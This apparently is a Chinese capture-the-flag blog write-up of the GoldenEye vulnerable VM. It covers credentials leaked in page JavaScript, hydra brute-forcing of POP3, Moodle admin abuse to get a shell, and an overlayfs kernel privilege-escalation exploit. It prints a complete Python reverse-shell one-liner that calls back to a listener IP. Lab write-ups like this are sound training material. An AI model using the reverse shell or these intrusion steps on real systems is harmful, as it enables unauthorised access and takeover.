GoldenEye

靶机
字数统计: 469字   |   阅读时长≈ 1分钟

0x00 知识要点

1.js信息泄露
2.hydra爆破pop3服务
3.登陆pop3服务(nc,list,retr)
4.moodle平台
5.拼写检查getshell
6.Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - ‘overlayfs’ Local Privilege Escalation提权

0x01 信息收集

没什么说的 nmap开路

image-20200229153745956

image-20200229164431947

80端口

image-20200229164431947

那么我们就尝试访问下吧

image-20200229154627261

CTF的常规思路 看页面源码

image-20200229154847054

发现个js 跟过去 看看我看到了什么

两个人名 Natalya和Boris

编码解码后得到密码 InvincibleHack3r

image-20200229155010107

这里注意 通过小写的boris加密码才能登陆进去

image-20200229160731176

文中意思pop3在5万多的端口,hydra爆它!

image-20200229170142495

拿到账号 nc去连

image-20200229171304311

文件2发现信息

image-20200229171414370

image-20200229171706959

既然告诉了 那么就执行吧 设置下本地hosts 否则公网这个域名可不是什么好网站 嘿嘿

用给的账号密码登录上去

image-20200229173757810

知道了这个博士也有pop3账号 那么继续爆他

爆完继续nc连pop3 老轨迹 看邮件 拿到web账号

image-20200229175240633

登上去发现txt文件

image-20200229175804918

下载下来 看下文件属性

image-20200229180717132

base64解密 脑洞一下 首页说有admin账户 结合这个 登一下

image-20200229181059568

admin权限还挺大 python弹shell nc接着

poc这里 ip端口换一下

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.43.201”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’

image-20200229181554758

网站一些配置要改否则弹不出来

233

点这个倒三角

0x02 开始反连

3334

image-20200229182613818

看下内核 好像可以提权 exp去exploit db就行

image-20200229190909045

靶机没gcc环境 要改下exp gcc改成cc仅这一处即可

image-20200229191330300

python起个http wget过去 exp放着下面 访问路径要注意 这里我失误了几次

image-20200229192156502

编译一下 给个权限

0x03 提权成功

image-20200229192551692

image-20200229192806714

访问下路径 此时bgm响起 题材不错很有意思

111

打赏
  • 版权声明: 本博客所有文章除特别声明外,均采用 Apache License 2.0 许可协议。转载请注明出处!
  • © 2015-2020 Loki
  • Powered by Hexo Theme Ayer
  • PV: UV:

请我喝杯咖啡吧~

支付宝
微信